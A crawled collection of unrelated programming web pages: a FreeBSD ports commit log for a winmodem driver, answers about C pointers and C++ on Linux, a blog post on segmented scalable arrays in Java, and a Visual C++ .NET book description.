Sponsored by: Google Summer of Code 2007
Approved by: portmgr (pav)
Populate the 'kld' virtual category, for ports that install Kernel Loadable
modules.
Hat: portmgr
Catch up with the newbus API changes in -CURRENT and
make it compile/work there again.
Approved by: osa
Be more optimitic: use sophistic RESTRICTED knob instead of
terrible NO_PACKAGE.
Do not bump PORTREVISION.
Approved by: portmgr (kris)
Install kernel module to ${KMODDIR}. [1]
Update port infrastructure.
Do not build package for this port, because it depends on kernel sources.
Take maintainership.
Requested by: glebius [1]
Approved by: portmgr (krion)
- Unbroken
- Remove extra install of rc.d script
- Bump PORTREVISION
- portlint(1)
Approved by: portmgr (kris)
BROKEN: Incomplete pkg-plist.
Bump PORTREVISION (had to do this in my previous commit).
Reminded by: kris
Fix build on recent -CURRENT.
PR: 92131
Submitted by: Stepan Zastupov, glebius
- Add SHA256
Fix build under resent 7.0 (src/sys/sys/interrupt.h rev. 1.32).
Bump PORTREVISION.
Remove obsolete mastersite.
Source: distfile survey
Bump the PORTREVISION to reflect fixes to the patch to make this
compile again.
Use new PCI_BAR(x) macro everywhere in preference to the PCI_MAPS + x * 4
used before. PCI_MAPS has disappeared. If PCI_BAR(x) doesn't exist, define
it to the old expansion.
Reviewed by: jhb
Repackage a bit: USE_RC_SUBR with substitutions
Fix "Ignoring d_maj hint from driver" on recent -CURRENT.
Patch from: glebius
Honor SYSDIR overrides
Ignore warnings on module builds
# this still fails on current due to SWI_CAMNET removal
Fix build on recent -CURRENT.
Notice from: ale, glebius.
Fix build under resent 6.0 (SWI_CAMNET and SWI_CAMBIO removed by scottl).
Use RC_SUBR.
Bump PORTREVISION.
<raoul.megelas@libertysurf.fr>.
Realy fix "link_elf: symbol ttyclose undefined" error and
one more time bump PORTREVISION.
Reset MAINTAINER field to ports@FreeBSD.org, because
Daniel O'Connor no longer have the hardware though.
Pointly hat: osa}
Revert back wrong changes, because port have strange
infrastructure: patch-aa and patch-ac both patch the same
file: ${WRKSRC}/sys/dev/ltmdm/ltmdmsio.
Chase fixes in TTY source.
<Darius> and tell phk to stop breaking tty source compat!
Submitted by: darius@dons.net.au
Reviewed by: Barney Wolff <barney@databus.com>
Update to handle systems after linesw was changed to an array of
pointers
()
Submitted by: Daniel O'Connor <doconnor-NOSPAM@gsoft.com.au>
SIZEify (maintainer timeout)
My last attempt to fix 5.x was incorrect for 4.x. Move a #endif around so
it covers the correct scope.
Catch up to the cdevsw changes in 5-current.
Cosmetic fix: use %%DOCSDIR%% macro.
No functionally changes.
Submitted by: Oleg Karachevtsev <ok@etrust.ru>
A part of PR: 57992
Fix build on current by adjusting includes to use dev/pci/... instead of
pci/... and using dev/ic/ns16550.h rather than dev/sio/sioreg.h.
Reviewed by: maintainer
Fix for -CURRENT.
PR: 48922
Submitted by: Daniel O'Connor <darius@dons.net.au> (maintainer)
Sergey A. Osokin <osa@FreeBSD.org.ru>
Catching up with MAJOR_AUTO.
De-pkg-comment.
Remove broken master site.
PR: 47954
Submitted by: Sergey A.Osokin <osa@FreeBSD.org.ru>
Fix "gibberish" in the file
Submitted by: dke@detalem.mine.nu
Add missing startup script
Submitted by: author
Approved by: maintainer
Fix properly for building under -current
Enable cardbus support these modembs
Bump PORTREVISION
Submitted by: author
Approved by: maintainer
Fix building on -current
Approved by: maintainer
Update to version 1.4.
PR: 35885
Submitted by: maintainer
Update to version 1.2.
Upgrade to 1.1. This includes fixes for -CURRENT according to Daniel and
WATANABE-san. Also added a faster mirror of the tarball.
add ltmdm Driver for the Lucent LT Winmodem chipset
Servers and bandwidth provided byNew York InternetSuperNews
6 vulnerabilities affecting 11 ports have been reported in the past 14 days
* - modified, not new
All vulnerabilities | http://www.freshports.org/comms/ltmdm | crawl-002 | refinedweb | 821 | 51.65 |
I have a very simple code here but I can't really understand what's happening on the memory:
#include <stdio.h>
#include <stdlib.h>
int main(){
int v[8], *u = &v[2];
v[2] = 20;
printf("%d",*u);
return 0;
}
#include <stdio.h>
#include <stdlib.h>
int main(){
int a = 10, *b;
b = &a;
printf("%d",*b);
return 0;
}
int v[8], *u = &v[2];
This line is defining two things. It's making an array of ints called
v that has storage for 8 ints. It's also making a pointer to int, called
u that is set to point to the second element in
v.
v[2] = 20;
This line sets the second element in the
v array to 20. Keep in mind that
u also points to this element from the previous line.
printf("%d",*u);
This line just prints the value that
u points to. Since it points to the second element in the array
v, and that element is set to 20, it'll print 20.
Your second code:
int a = 10, *b; b = &a; printf("%d",*b);
Could also be written as:
int a = 10, *b = &a; printf("%d",*b);
It's just moving the second line onto the first. Then the only difference between your two examples is the array notation. | https://codedump.io/share/EJwWCQpgcvRc/1/saying-a-pointer-is-equal-to-a-position-in-the-memory-in-c | CC-MAIN-2016-50 | refinedweb | 219 | 81.83 |
-08, at 3:13 AM, Sherm Pendley wrote:
> I finally got a Panther partition set up on my old G4 and tested
> this using ShuX, and that's the problem exactly. The framework
> "stub" chooses the correct platform and Perl version, and loads the
> correct support bundle. Then, when main.pm uses CamelBones.pm,
> which in turn loads the CamelBones.bundle in the Perl module - the
> one that's built from CamelBones.xs - that's when the undefined
> symbols happen. There are complaints in the console log that
> symbols referenced in CamelBones.bundle aren't being found.
>
> I tried adjusting the project settings, Perl SDK for Panther, and
> the Makefile.PL, so that the Panther build uses GCC 3.3 - which
> made no difference. I didn't think it would. If I remember the
> technote correctly, GCC 3.3 is only required if you use C++ and
> need to support Panther systems that are still on 10.3.8 or older.
> If you're not using C++, or you are using it and you can require
> the latest 10.3.9 patch, then GCC 4 should work for Panther.
>
> I tried tweaking some other things too, with no better results.
Could this be an issue with flat and/or non-flat namespaces?
See:?
q=cache:lREHpX7tO1MJ:developer.apple.com/technotes/tn2002/tn2071.html
+mac+gcc+flat&hl=en&ct=clnk&cd=5&client=firefox-a
View entire thread | https://sourceforge.net/p/camelbones/mailman/message/18682417/ | CC-MAIN-2017-43 | refinedweb | 238 | 70.39 |
Hi,
I'm trying to find out a way how I can insert bunch of docs via bulk
python API, e.g. insert_many, where I may have a duplicate in my docs.
Current behavior stop when it encounters a duplicate error and it does not
proceed afterwards because of thrown exception. I'd like to avoid that
behavior and I want to bulk succeed and just skip duplicates. Here is a
simple example:
from pymongo import MongoClient, DESCENDING
from pymongo.errors import BulkWriteError
uri = 'mongodb://localhost:8230'
client = MongoClient(uri)
coll = client['test']['db']
coll.create_index([('test',DESCENDING)], unique=True)
docs = [{'test':1} for _ in range(10)] + [{'foo':1 for _ in range(5)}]
try:
coll.insert_many(docs)
except BulkWriteError:
pass
docs = [{'bla':1} for _ in range(10)]
coll.insert_many(docs)
Doing so, I only see two docs in my test.db
{"test": 1, "_id": "572bd5392f74d466951ebb4a"}
{"_id": "572bd5392f74d466951ebb55", "bla": 1}
while I want to see 3 docs one with test, one with foo and one with bla
keys.
We have an application which needs to write millions docs and I thought we
can avoid a full scan to remove duplicates. Of course I can use plain
insert, but it will be much slower operation.
Thanks,
Valentin. | https://marc.ttias.be/mongodb-user/2016-05/msg00105.php | CC-MAIN-2017-34 | refinedweb | 208 | 64.41 |
(This is more a question to Sascha Weinreuter than a general OpenAPI question)
Let's say I want to reuse (inject) the XPathLanguage into some custom language...
1) Is it possible?
2) It seems that XPathLanguage can provide completion for element and attribute
names from a given (queried) document.
How do I tell the language where to look (eg what xml document to use)
Regards,
Taras
ps IntelliLang looks very nice!
Hello Taras,
Don't hesitate to email me directly ;)
Yes, absolutely.
This is done by an implementation of a special ContextProvider class that is
responsible for things like name-completion, error highlighting (variables,
namespaces), etc. The specific logic to learn all names from a given XML
document or XML schema/dtd is currently implemented in the XSLT support's
ContextProvider.
Unfortunately, the plugin repository refused to accept the source code last time
I tried to upload it, so I'm afraid it is not gonna be available publicly. But
I'll send you a copy via email later.
Sascha
Thanks :)
Hello Sascha,
>> 2) It seems that XPathLanguage can provide completion for element and
>> attribute names from a given (queried) document.
>> How do I tell the language where to look (eg what xml document to
>> use)
If I understand correctly, you're able to extract suggestions from just a
DTD/Schema as well?
Not to sound stupid, but isn't that quite complex? I mean in the context
of XSD schema, it can be pretty messy to find out whether a given element
is allowed at a given location.
Hello Taras,
It's not that clever. It just tries to extract all element/attribute names
that are mentioned in a schema with the help of XmlNSDescriptor and friends.
"Smart Completion" might come in the future though.
Sascha | https://intellij-support.jetbrains.com/hc/en-us/community/posts/206896195-Reusing-XPathLanguage | CC-MAIN-2020-16 | refinedweb | 297 | 70.33 |
Template:TRSref-bot
From Wikibooks, open books for an open world
- Purpose
- This template is used with {{TRSref-top}} instead of {{ORP-top}} to set off Wiki reference pages, and especially those that are NOT based the N3V TrainzOnline Wiki which need NO attribution to the CC-BY-SA 2.0 License. Use this one on lists, archived dated pages or those using examples of or adapted from the portions of freeware (Public Domain) assets.
- Lastly, this template closes a <div style=" ..."> HTML block initiated by {{TRSref-top}}. They should be used together as a pair top and bottom of each page.
- It will also auto-categorize the page to the category:Trainz references.
- It can be given the
{{{1}}}default parameter to alter the sort order of the reference page as listed in that category.
Options[edit]
- define '| cat1=', '| cat2=', or '|cat3=' some-cat-names to add those categories to the page without either "Category:" namespace, nor '[[' or ']]' allowed. (their provided free of charge along with the default pipe linking to the {{SUBPAGENAME}}. See mw:Help:pipe link. | https://en.wikibooks.org/wiki/Template:TRSref-bot | CC-MAIN-2017-22 | refinedweb | 179 | 63.39 |
On a shared computer, ALL users of the standard version
must do an installation from their own user account. This ensures that their own
language folder is properly installed and updated in the future.
Download the imdsetup file below.
Run the installer and follow the instructions.
Download for Windows
version 3.85
Download the imdinstaller file below.
Run the dmg file and work through the
installation.
The program is installed into the main
Applications directory and default diary file diary.ads will be in a
folder called In My Diary in your documents folder
Download for Mac
version 3.83 (This 32bit app will not work
on versions from Catalina - 10.15.7 - onwards)
In My Diary on Linux can be used either by installing the
Windows version and running it in the Wine emulator or by installing the native
Debian package below (please note, at the moment In My Diary will only run on a
32 bit system). When installing using Wine, follow the instructions as for
Windows, but you will need to set the executable property of the installer once
you have downloaded it. Go to the folder where your browser stores its downloads
and right-click over the imdsetup<version>.exe file. Select 'Properties' from
the bottom of the list, click the permissions tab and tick the executable
property box. Once installed you will find the program listed as a submenu to
the Wine application.
When installing the native version which has been
tested with Ubuntu, download the Debian binary package below and
double-click it to run. Once installed you will find the program listed
under the Office section of your applications.
If you are installing from new (never having used
this application before on Linux) then the program should run after
installation without issue.
HOWEVER - if you already have a native version
installed, when you try to run this new version you might get a message
telling you that your language folder has not been found. If this is
the case you will need to follow the instructions
here.
Download for Native Linux
version 3.82 (32bit only, but may run on 64bit with
appropriate libraries installed, although later versions of Linux are
reporting problems, even with the 64bit libraries in place)
For some reason the Windows version running in the Wine
emulator actually runs faster than the native version (pages turn more quickly
etc.).
For users of 64bit operating systems, the Wine
option is the only one available unless you have the necessary 32-bit
libraries installed.
Dates prior to 1904 do not display correctly in the native
Linux version. This might not be a problem for most people!
The native version does not allow for any printing
of calendar or contacts.
Export to excel from the Full Address List and
list of ticked addresses does not work with the Windows/Wine version. In
the native version, the Excel alternative (Open Office etc.) deals with
the export fine.
Data cannot be imported into In My Diary by
dragging it to the Windows/Wine version (but the File menu now allows an
alternative route). Dragging works fine in the native version.
My experience of Linux systems is limited, so if
you have a problem with the native version I may not be able to help
you.
Unless you have an aversion to using Wine as part of your
Linux setup, and I can understand why some people do, then I would recommend
using the Windows version running in the Wine emulator. The main reason for this
is that it is more reliable across the various flavours of Linux. The tests I
have carried out trying In My Diary on various versions of Ubuntu, Debian and
Mint have resulted in several running anomalies which make it impossible for me
to support and test the program reliably. The emulated version is also
quicker and allows for dates prior to 1904. In my opinion, these benefits
outweigh the restrictions.
RiscOS 'Organizer' users can now
import their diary, contacts and Journal into In My Diary. Instructions
how to do this are
here | http://www.inmydiary.co.uk/standard.php | CC-MAIN-2021-25 | refinedweb | 683 | 62.48 |
Jochen Wiedmann created FREEMARKER-40:
-----------------------------------------
Summary: ClassIntrospector should detect public methods in non-public classes
Key: FREEMARKER-40
URL:
Project: Apache Freemarker
Issue Type: Bug
Components: engine
Affects Versions: 2.3.25-incubating
Reporter: Jochen Wiedmann
Priority: Minor
In ClassIntrospector.discoverAccessibleMethods, the assumption is made, that only public classes
can have accessible methods. This is plainly wrong: For example, a private object might be
implementing an interface.
Freemarker should detect public gettters, and treat them as accessible. At the very least,
it should inform the user about the problem. A message like
"Key <propertyName> was not found on an instance of ..."
should be replaced by
"Key <propertyName> was not found on an instance of ..."
"A possible reason is,that the class must be public."
Thanks,
Jochen
--
This message was sent by Atlassian JIRA
(v6.3.4#6332) | http://mail-archives.apache.org/mod_mbox/freemarker-notifications/201611.mbox/%3CJIRA.13020343.1479032870000.263298.1479032878324@Atlassian.JIRA%3E | CC-MAIN-2017-39 | refinedweb | 137 | 50.23 |
While implementing Edulinq, I only focused on two implementations: .NET 4.0 and Edulinq. However, I was aware that there were other implementations available, notably LinqBridge and the one which comes with Mono. Obviously it’s interesting to see how other implementations behave, so I’ve now made a few changes in order to make the test code run in these different environments.
The test environments
I’m using Mono 2.8 (I can’t remember the minor version number offhand) but I tend to think of it as "Mono 3.5" or "Mono 4.0" depending on which runtime I’m using and which base libraries I’m compiling against, to correspond with the .NET versions. Both runtimes ship as part of Mono 2.8. I will use these version numbers for this post, and ask forgiveness for my lack of precision: whenever you see "Mono 3.5" please just think "Mono 2.8 running against the 2.0 runtime, possibly using some of the class libraries normally associated with .NET 3.5".
LinqBridge is a bit like Edulinq – a clean room implementation of LINQ to Objects, but built against .NET 2.0. It contains its own Func delegate declarations and its own version of ExtensionAttribute for extension methods. In my experience this makes it difficult to use with the "real" .NET 3.5, so my build targets .NET 2.0 when running against LinqBridge. This means that tests using HashSet had to be disabled. The version of LinqBridge I’m running against is 1.2 – the latest binary available on the web site. This has AsEnumerable as a plain static method rather than an extension method; the code has been fixed in source control, but I wanted to run against a prebuilt binary, so I’ve just disabled my own AsEnumerable tests for LinqBridge. Likewise the tests for Zip are disabled both for LinqBridge and the "Mono 3.5" tests as Zip was only introduced in .NET 4.
The other issue of not having .NET 4 available in the tests is that the string.Join<T>(string, IEnumerable<T>) overload is unavailable – something I’d used quite a lot in the test code. I’ve created a new static class called "StringEx" and replaced string.Join with StringEx.Join everywhere.
There are batch files under a new "testing" directory which will build and run:
- Microsoft’s LINQ to Objects and Edulinq under .NET
- LinqBridge, Mono 3.5’s LINQ to Objects and Edulinq under Mono 3.5
- Mono 4.0’s LINQ to Objects and Edulinq under Mono 4.0
Although I have LinqBridge running under .NET 2.0 in Visual Studio, it’s a bit of a pain building the tests from a batch file (at least without just calling msbuild). The failures running under Mono 3.5 are the same as those running under .NET 2.0 as far as I can tell, so I’m not too worried.
Note that while I have built the Mono tests under both the 3.5 and 4.0 profiles, the results were the same other than due to generic variance, so I’ve only included the results of the 4.0 profile below.
What do the tests cover?
Don’t forget that the Edulinq tests were written in the spirit of investigation. They cover aspects of LINQ’s behaviour which are not guaranteed, both in terms of optimization and simple correctness of behaviour. I have included a test which demonstrates the "issue" with calling Contains on an ICollection<T> which uses a non-default equality comparer, as well as the known issue with OrderByDescending using a comparer which returns int.MinValue. There are optimizations which are present in Edulinq but not in LINQ to Objects, and I have tests for those, too.
The tests which fail against Microsoft’s implementation (for known reasons) are normally marked with an [Ignore] attribute to prevent them from alarming me unduly during development. NUnit categories would make more sense here, but I don’t believe ReSharper supports them, and that’s the way I run the tests normally. Likewise the tests which take a very long time (such as counting more than int.MaxValue elements) are normally suppressed.
In order to truly run all my tests, I now have a horrible hack using conditional compilation: if the ALL_TESTS preprocessor symbol is defined, I build my own IgnoreAttribute class in the Edulinq.Tests namespace, which effectively takes precedence over the NUnit one… so NUnit will ignore the [Ignore], so to speak. Frankly all this conditional compilation is pretty horrible, and I wouldn’t use it for a "real" project, but this is a slightly unusual situation.
EDIT: It turns out that ReSharper does support categories. I’m not sure how far that support goes yet, but at the very least there’s "Group by categories" available. I may go through all my tests and apply a category to each one: optimization, execution mode, time-consuming etc. We’ll see whether I can find the energy for that :)
So, let’s have a look at what the test results are…
Edulinq
Unsurprisingly, Edulinq passes all its own tests, with the minor exception of CastTest.OriginalSourceReturnedDueToGenericCovariance running under Mono 3.5, which doesn’t include covariance. Arguably this test should be conditionalised to not even run in that situation, as it’s not expected to work.
Microsoft’s LINQ to Objects
8 failures, all expected:
- Contains delegates to the ICollection<T>.Contains implementation if it exists, rather than using the default comparer for the type. This is a design and documentation issue which I’ve discussed in more detail in the Contains part of this series.
- Optimization: ElementAt and ElementAtOrDefault don’t validate the specified index eagerly when the input sequence implements ICollection<T> but not IList<T>.
- Optimization: OfType always uses an intermediate iterator even when the input sequence already implements IEnumerable<T> and T is a non-nullable value type.
- Optimization: SequenceEqual doesn’t compare the counts of the sequences eagerly even when both sequences implement ICollection<T>
- Correctness: OrderByDescending doesn’t work if you use a key comparer which returns int.MinValue
- Consistency: Single and SingleOrDefault (with a predicate) don’t throw InvalidOperationException as soon as they encounter a second element matching the predicate; the predicate-less overloads do throw as soon as they see a second element.
All of these have been discussed already, so I won’t go into them now.
LinqBridge
LinqBridge had a total of 33 failures. I haven’t looked into them in detail, but just going from the test output I’ve broken them down into the following broad categories:
- Optimization:
- Cast never returns the original source, presumably always introducing an intermediate iterator.
- All three of Microsoft’s "missed opportunities" listed above are also missed in LinqBridge
- Use of input sequences:
- Except and Intersect appear to read the first sequence first (possibly completely?) and then the second sequence. Edulinq and LINQ to Objects read the second sequence completely and then stream the first sequence. This behaviour is undocumented.
- Join, GroupBy and GroupJoin appear not to be deferred at all. If I’m right, this is a definite bug.
- Aggregation accuracy: both Average and Sum over an IEnumerable<float> appear to use a float accumulator instead of a double. This is probably worth fixing for the sake of both range and accuracy, but isn’t specified in the documentation.
- OrderBy (etc) appears to apply the key selector multiple times while sorting. The behaviour here isn’t documented, but as I mentioned before, it could produce performance issues unnecessarily.
- Exceptions:
- ToDictionary should throw an exception if you give it duplicate keys; it appears not to – at least when a custom comparer is used. (It’s possible it’s just not passing the comparer along.)
- The generic Max and Min methods don’t return the null value for the element type when that type is nullable. Instead, they throw an exception – which is the normal behaviour if the element type is non-nullable. This behaviour isn’t well documented, but is consistent with the behaviour of the non-generic overloads. See the Min/Max post for more details.
- General bugs:
- The generic form of Min/Max appears not to ignore null values when the element type is nullable.
- OrderByDescending appears to be broken in the same way as Microsoft’s implementation
- Range appears to be broken around its boundary testing.
- Join, GroupJoin, GroupBy and ToLookup break when presented with null keys
Mono 4.0 (and 3.5, effectively)
Mono failed 18 of the tests. There are fewer definite bugs than in LinqBridge, but it’s definitely not perfect. Here’s the breakdown:
- Optimization:
- Mono misses the same three opportunities that LinqBridge and Microsoft miss.
- Contains(item) delegates to ICollection<T> when it’s implemented, just like in the Microsoft implementation. (I assume the authors would call this an "optimization", hence its location in this section.) I believe that LinqBridge has the same behaviour, but that test didn’t run in the LinqBridge configuration as it uses HashSet.
- Average/Sum accumulator types:
- Mono appears to use float when working with float values, leading to more accumulator error than is necessary.
- Average overflow for integer types
- Mono appears to use checked arithmetic when summing a sequence, but not when taking the average of a sequence. So the average of { long.MaxValue, long.MaxValue, 2 } is 0. (This originally confused me into thinking it was using floating point types during the summation, but I now believe it’s just a checked/unchecked issue.)
- Bugs:
- Count doesn’t overflow either with or without a predicate
- The Max handling of double.NaN isn’t in line with .NET. I haven’t investigated the reason for this yet.
- OrderByDescending is broken in the same way as for LinqBridge and the Microsoft implementation.
- Range is broken for both Range(int.MinValue, 0) and Range(int.MaxValue, 1). Test those boundary cases, folks :)
- When reversing a list, Mono doesn’t buffer the current contents. In other words, changes made while iterating over the reversed list are visible in the returned sequence. The documentation isn’t very clear about the desired behaviour here, admittedly.
- GroupJoin and Join match null keys, unlike Microsoft’s implementation.
How does Edulinq fare against other unit tests?
It didn’t seem fair to only test other implementations against the Edulinq tests. After all, it’s only natural that my tests should work against my own code. What happens if we run the Mono and LinqBridge tests against my code?
The LinqBridge tests didn’t find anything surprising. There were two failures:
- I don’t have the "delegate Contains to ICollection<T>.Contains" behaviour, which the tests check for.
- I don’t optimize First in the case of the collection implementing IList<T>. I view this as a pretty dubious optimization to be honest – I doubt that creating an iterator to get to the first item is going to be much slower than checking for IList<T>, fetching the count, and then fetching the first item via the indexer… and it means that all non-list implementations also have to check whether the sequence implements IList<T>. I don’t intend to change Edulinq for this.
The Mono tests picked up the same two failures as above, and two genuine bugs:
- By implementing Take via TakeWhile, I was iterating too far: in order for the condition to become false, we had to iterate to the first item we wouldn’t return.
- ToLookup didn’t accept null keys – a fault which propagated to GroupJoin, Join and GroupBy too. (EDIT: It turns out that it’s more subtle than that. Nothing should break, but the MS implementation ignores null keys for Join and GroupJoin. Edulinq now does the same, but I’ve raised a Connect issue to suggest this should at least be documented.)
I’ve fixed these in source control, and will add an addendum to each of the relevant posts (Take, ToLookup) when I have a moment spare.
There’s one additional failure, trying to find the average of a sequence of two Int64.MaxValue values. That overflows on both Edulinq and LINQ to Objects – that’s the downside of using an Int64 to sum the values. As mentioned, Mono suffers a degree of inaccuracy instead; it’s all a matter of trade-offs. (A really smart implementation might use Int64 while possible, and then go up to using Double where necessary, I suppose.)
Unfortunately I don’t have the tests for the Microsoft implementation, of course… I’d love to know whether there’s anything I’ve failed with there.
Conclusion
This was very interesting – there’s a mixture of failure conditions around, and plenty of "non-failures" where each implementation’s tests are enforcing their own behaviour.
I do find it amusing that all three of the "mainstream" implementations have the same OrderByDescending bug though. Other than that, the clear bugs between Mono and LinqBridge don’t intersect, which is slightly surprising.
It’s nice to see that despite not setting out to create a "production-quality" implementation of LINQ to Objects, that’s mostly what I’ve ended up with. Who knows – maybe some aspects of my implementation or tests will end up in Mono in the future :)
Given the various different optimizations mentioned in this post, I think it’s only fitting that next time I’ll discuss where we can optimize, where it’s worth optimizing, and some more tricks we could still pull out of the bag…
12 thoughts on “Reimplementing LINQ to Objects: Part 39 – Comparing implementations”
Does LINQ to Objects have 6 failures or 5?
Not that this is an argument for or against it, but I find it interesting that (presumably) every other implementation does the Contains() optimization.
And an *actually* smart implementation would fallback to BigInteger for integral Average() when checked() throws, but I probably think that because I’ve spent to long reading David Gay’s dtoa.c :).
@configurator: 6, but I lumped ElementAt and ElementAtOrDefault into the same bullet point as it’s the same “missing optimization”.
@Simon: Yes, I’m thinking of going with the flow when it comes to Contains, annoying as it is.
I considered BigInteger, but dividing the result by the count to get a double could be tricky.
I think that BigInteger would work in pretty well. Keep in mind that (a / b) == (a b) + ((a % b) / b).
@John: Sure, but you’ve still got to do those conversions. I guess you can convert each part to a double, then do the arithmetic, then add the results…
(There’s also the efficiency issue. I still suspect you’d only want to do this once you’d otherwise break Int64.MaxValue.)
I cannot believe Mono implements int64 sums with doubles. That will introduce unpredictable imprecisions far below the overflow threshold. Horrible, unreliable.
@tobi: Looking at the code, I think I may be wrong about that. I was only working on test results… but looking at the code, I believe the problem is *actually* that it doesn’t run in a checked context. In other words, it doesn’t detect overflow properly. I suspect that should be easy to test – I’ll have a look at home tonight and fix the blog post.
Thank god, I can now sleep easy again. At least your theory was consistent with your observations.
@tobi: remember that Average returns double, Average(IEnumerable) is probably only inaccurate in the last bit or two, better with positive only input, though pathologically it seems it could be *every* bit wrong! Most cases it would be close to the inaccuracy of the final double divide that all the Average()s would be implemented with. You probably aren’t worried about the 11 bits precision difference between Int64 and Double, since you gain fractional results. An “IntX Enumerable.Average(IEnumerable, out Ratio remainder)” would be nice, though.
Jon,
I think you missed another difference between Edulinq and Linq to Objects.
See this question on SO:
Basically, it says that in Linq to Objects, the Single overload with a predicates always enumerates the whole sequence, even if the predicate matches more than one item. On the other hand, Edulinq throws InvalidOperationException as soon as a second match is found, which avoids enumerating the rest of the sequence.
I’m not sure why MS didn’t optimize this case, which is pretty obvious…
@Thomas: Wow. That’s awful, IMO. Will add a test case for that tonight and update the blog post. | https://codeblog.jonskeet.uk/2011/01/25/reimplementing-linq-to-objects-part-39-comparing-implementations/?like_comment=12886&_wpnonce=fd2f06a0b3 | CC-MAIN-2020-24 | refinedweb | 2,772 | 64.3 |
JustLinux Forums
>
Community Help: Check the Help Files, then come here to ask!
>
Programming/Scripts
> some information about c++
PDA
Click to See Complete Forum and Search -->
:
some information about c++
deathadder
02-10-2003, 07:00 PM
ive been teachin myself c++ in windows now for a while and im gettin the basics i was wounderin if c++ is:
a) like i heard different for windows and linux, i mean differences in the code
b)if it is different how different, could i get away with usin the windows verson of would i need to learn it for linux
thanks
Palin
02-10-2003, 07:09 PM
the standard C++ functionality is the same the librarieas and headers you use may be different. if you use g++ you can use the old standard way of including the standard libraries or you can use the new ones
old <iostream.h>
new <iostream>
g++ is built to the ANSI standard so if you know that you should be ok. Hope this helps
deathadder
02-10-2003, 07:24 PM
yeah it does help thanks for the reply
Dun'kalis
02-10-2003, 07:37 PM
You'll also have to do one of the following for any header functions you use, if you're using the new headers.
Here is the example program I'll use
#include <iostream>
int main()
{
cout << "Hello, world!";
}
This prints "Hello, world!".
If you compile it, it will complain. To fix that..
A. Instead of cout, use std::cout
B. Put the line "using std::cout;" before the main.
C. Put the line "using namespace std;" before the main.
Use any of these.
Word of Warning:
"using namespace std;" is NOT recommended! Use A or B, preferably.
justlinux.com | http://justlinux.com/forum/archive/index.php/t-89709.html | crawl-003 | refinedweb | 293 | 78.48 |
Delegatee tutorial: Increase your influence by leasing additional Steem Power
If you want extra Steem Power for a certain period of time and boost your influence in the community, then delegationhub.com is what you have been looking for! We can offer the most competitive rates in the market because we have the lowest platform fees for Delegators: Only 5% in comparison to existing platforms that charge 10% (50% less!). This means as a Delegatee your lease requests will show a higher return (APR) and gets more attractive for Delegators for the same amount of Steem invested!
How can I lease Steem Power?
You can lease Steem Power in 4 simple steps:
- Step 1: Go to.
- Step 2: Click on "Create lease request" and fill in your desired lease requirements. The APR (interest rate) is calculated automatically. There are 0% fees for any delegation request.
- Step 3: Click "Lease SP" and you will be redirected to steemconnect.
- Step 4: Sign in with your username and private active key and you are done. You will get a confirmation message from Delegation Hub that your lease request has been added.
Your lease request will now show under the tab "available lease requests". Once it is filled by a Delegator you will get a second confirmation message and see the additional Steem Power in your steemit account. For the detailed click-by-click guide, please refer to the instructions below.
For the detailed FAQ, please visit.
Q1: What happens if my lease request is not filled? In case your lease request is not filled within 5 days, your lease request will be delisted and the original amount of STEEM returned to you.
Q2: What if I want to edit or cancel my open lease request? You can cancel your open lease request any time under "Cancel unfulfilled lease request". Your request will be delisted and your invested Steem immediately returned to you. You can now place a new lease request.
Q3: What happens at the end of the lease period? You will receive a message before the lease contract expires that allows you to renew the lease contract. If you take no actions, the Delegator will undelegate once the lease period has ended.:
- Twitter: | https://steemit.com/steem/@delegationhub/delegatee-tutorial-increase-your-influence-by-leasing-additonal-steem-power | CC-MAIN-2021-17 | refinedweb | 371 | 65.01 |
The Scalable Array
The Scalable Array
Join the DZone community and get the full member experience.Join For Free
Learn how to operationalize machine learning and data science projects to monetize your AI initiatives. Download the Gartner report now.
In GraphHopper we can create very tiny graphs for indoor routing, but we can also scale to graphs holding the road network from the planet. And we can expand to this size on demand. The reason is a very simple trick, which we didn't invent and can be found in other systems like ElasticSearch as well.
Internally we're using a simple array. But this won't scale for two reasons:
- An array e.g. byte[] is limited to only 2GB as it is accessed via integer values.
- To expand the size of an array you need a second destination array which is larger
The second point is bad in terms of memory usage if you have a large array and you want increase it a bit you need more than twice the size of the original array.
But we can easily solve both problems when we use a list of arrays instead. Assume the following wrapper class which can be found in real life:
public class RAMDataAccess { private int[][] segments = new int[0][]; public void ensureCapacity( long bytes ) { ... // if you want to increase the size you just need to create new segments for (int i = segments.length; i < newSegs.length; i++) newSegs[i] = new int[1 << segmentSizeIntsPower]; segments = newSegs; ... } public void setInt( long longIndex, int value ) { longIndex >>>= 2; int bufferIndex = (int) (longIndex >>> segmentSizeIntsPower); int index = (int) (longIndex & indexDivisor); segments[bufferIndex][index] = value; } public final int getInt( long longIndex ) { longIndex >>>= 2; int bufferIndex = (int) (longIndex >>> segmentSizeIntsPower); int index = (int) (longIndex & indexDivisor); return segments[bufferIndex][index]; } }
If you look at the get and set methods more closely you'll see that the access is optimized as well. The simplest approach to calculate the access indices would be:
segments[longIndex / segments.length][longIndex % segments.length];
But if your segments have a size ala 2^n you can use the slightly faster bit operations as pointed out e.g. here.
But the story does not end here. E.g. if we hide those internals behind an interface (we called it DataAccess) we can also use byte arrays or ByteBuffers instead of the integer array. A ByteBuffer can be retrieved from a memory mapped file which then enables us to access several hundred of megabytes on mobiles devices like Android where you only have 32MB of RAM.
If you are interested in more memory efficient data structures, OpenStreetMap, efficient JavaScript or routing algorithms in Java fork our repo or even join our GraphHopper team! }} | https://dzone.com/articles/scalable-array | CC-MAIN-2019-09 | refinedweb | 450 | 60.14 |
About the Book
Use managed C++ to create .NET applications with this step-by-step guide.
Teach yourself the latest version of Visual C++™—and begin developing for the Microsoftâ .NET platform—one step at a time. This practical, hands-on tutorial expertly guides you through the fundamentals—from writing managed code to running and debugging your first .NET applications and Web services. Work at your own pace through easy-to-follow lessons and hands-on exercises to learn essential techniques. And accelerate your productivity by working with instructive code and best practices for .NET development with Visual C++.
DISCOVER HOW TO:
• Write and run a simple object-oriented program
• Delve deeper with inheritance and other OOP techniques
• Execute code with the Microsoft Visual Studio® .NET debugger
• Exploit built-in .NET support for properties, arrays, and events
• Generate and handle exceptions
• Implement operator overloading
• Examine the .NET Framework, exploring major namespaces and classes
• Use Windows® Forms to create GUI applications
• Access data using XML and ADO.NET
• Create and use Web services
• Build Web service components with ATL
• Make legacy applications .NET-ready
CD FEATURES:
• All the book’s practice files
• Sample code
Related Books
Programming in the Key of C#: A Primer for Aspiring Programmers
Programming with Managed Extensions for Microsoft® Visual C++® .NET--Version 2003
Microsoft® Visual C++® .NET Step by Step--Version 2003
Customer Rating
